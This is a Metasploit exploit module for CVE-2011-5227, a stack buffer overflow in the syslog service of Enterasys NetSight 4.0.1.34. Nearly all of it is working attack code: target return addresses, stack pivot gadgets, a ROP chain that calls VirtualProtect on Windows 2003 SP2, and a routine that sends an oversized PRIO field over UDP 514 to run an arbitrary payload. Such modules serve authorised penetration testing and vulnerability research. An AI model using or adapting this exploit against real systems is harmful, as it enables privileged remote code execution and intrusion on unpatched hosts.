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require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Enterasys NetSight nssyslogd.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Enterasys NetSight. The
vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially
crafted PRIO from a syslog message. The module has been tested successfully on
Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.
},
'Author' =>
[
'Jeremy Brown', # Vulnerability discovery
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2011-5227'],
['OSVDB', '77971'],
['BID', '51124'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-350/'],
['URL', 'https://cp-enterasys.kb.net/article.aspx?article=14206&p=1']
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 3000,
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
['Enterasys NetSight 4.0.1.34 / Windows XP SP3',
{
'Offset' => 43,
'Ret' => 0x77c4e444 # ADD ESP,30 # POP EDX # RETN # from msvcrt
}
],
['Enterasys NetSight 4.0.1.34 / Windows 2003 SP2',
{
'Offset' => 43,
'Ret' => 0x77bdf444 # ADD ESP,30 # POP EDX # RETN # from msvcrt
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Dec 19 2011',
'DefaultTarget' => 1
))
register_options([ Opt::RPORT(514) ], self.class)
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_stackpivot
stack_pivot = ''
case target.name
when /Windows XP SP3/
stack_pivot << [0x77c4e448].pack("V") #ret
stack_pivot << [0x77c4e448].pack("V") #ret
stack_pivot << [0x77c4e448].pack("V") #ret
stack_pivot << [0x77c4e448].pack("V") #ret
stack_pivot << [0x77c4e444].pack("V") # ADD ESP,30 # POP EDX # RETN
when /Windows 2003 SP2/
stack_pivot << [0x77bdf448].pack("V") #ret
stack_pivot << [0x77bdf448].pack("V") #ret
stack_pivot << [0x77bdf448].pack("V") #ret
stack_pivot << [0x77bdf448].pack("V") #ret
stack_pivot << [0x77bdf444].pack("V") # ADD ESP,30 # POP EDX # RETN
end
return stack_pivot
end
def get_payload
my_payload = ''
case target.name
when /Windows XP SP3/
jmp_esp = [0x77c35459].pack("V")
my_payload << jmp_esp
when /Windows 2003 SP2/
rop_gadgets =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
#0x03C0990F,
0x03c09f0f,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0xb00 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
my_payload << rop_gadgets
end
my_payload << payload.encoded
return my_payload
end
def exploit
connect_udp
prio = "<"
prio << rand_text_alpha(19)
prio << get_stackpivot
prio << rand_text_alpha(4)
prio << [target.ret].pack("V")
prio << ">"
message = prio
message << rand_text_alpha(9 + (15 - Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length
message << get_payload
print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
udp_sock.put(message)
disconnect_udp
end
end
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